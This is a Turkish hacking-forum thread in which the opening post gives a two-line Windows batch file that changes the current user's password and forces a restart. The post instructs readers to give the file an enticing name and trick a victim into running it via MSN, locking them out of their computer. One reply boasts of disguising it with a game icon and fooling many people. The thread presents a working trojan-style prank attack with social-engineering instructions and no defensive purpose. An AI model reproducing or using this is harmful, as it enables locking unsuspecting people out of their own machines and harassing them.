Karşı Pc'ye Şifre Koy Herkes Yapabilir

TRCollapse

Üye
10 Tem 2013
86
0
Bu Konuyu Açmamın Sebebi Çok Kişi Bunu Anlatmış Ama Arkadaşlar Anlamamış Veya Yapamamış Bunda İse Çok Basit Hadi Kolay GeLsin

arkadaslar herkes yapabılır cok basıt bısey
ilk olarak Not Defterini açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: kızlar.bat)(kızlar falan deyınde adam yutsun)
code:
net user %username% 123456
shutdown -r

bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz değiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşı tarafa bi şekile kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmişolur pc'yi kendisi kapadığıanda şifreleniraçıldığında parola sorar bilen açar bilemeyen açamaz
100%100 calısıyor

(aLıNTıDıR)

erkanibo

Yeni üye
11 Eki 2013
7
0
ii geceler arkadaşlar benim içersnde resmlerim olan bir harddiskim vardı ve ben bunları windows şifreleme yaptım. ben bu resmleri yeni aldığım blgsayara attım ve diğer hdd de bozuldu. şimdi ise attığım resmler acılmıyor. klasörler yeşil renkte gözüküyor. bnm bildiğim kadarı ile sertifika sorunu var. ben bu sorunu nasıl çözerim.

2nokta

Yaşayan Forum Efsanesi
28 Şub 2013
16,689
16
ii geceler arkadaşlar benim içersnde resmlerim olan bir harddiskim vardı ve ben bunları windows şifreleme yaptım. ben bu resmleri yeni aldığım blgsayara attım ve diğer hdd de bozuldu. şimdi ise attığım resmler acılmıyor. klasörler yeşil renkte gözüküyor. bnm bildiğim kadarı ile sertifika sorunu var. ben bu sorunu nasıl çözerim.

İk olarak flood yapıyosun.İkinci olarak baskansın konusuna değil tht yardım merkzine açman gerek konuyu.

holocoust28 eskidi bu kardeş

eskise içim yanmz.Böyle bişeyi hala aklımızda kalması bile mucize :D
Kardeşim yararlı olsun diye konu açmak istemişsin ama konuyu açmdan önce forumda varmı yokmu diye bi kontrol et bi dahaki sefere. çok açıldı bu kondan baya baya çok açıldı. emeğime sağlık.

Juafler

Katılımcı Üye
23 Tem 2013
251
0
oyun lasörünün içerisine oyunun simgesi ile koydum salaklar yutmuş baya bi kişi bana sövmüştü yazık :D

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.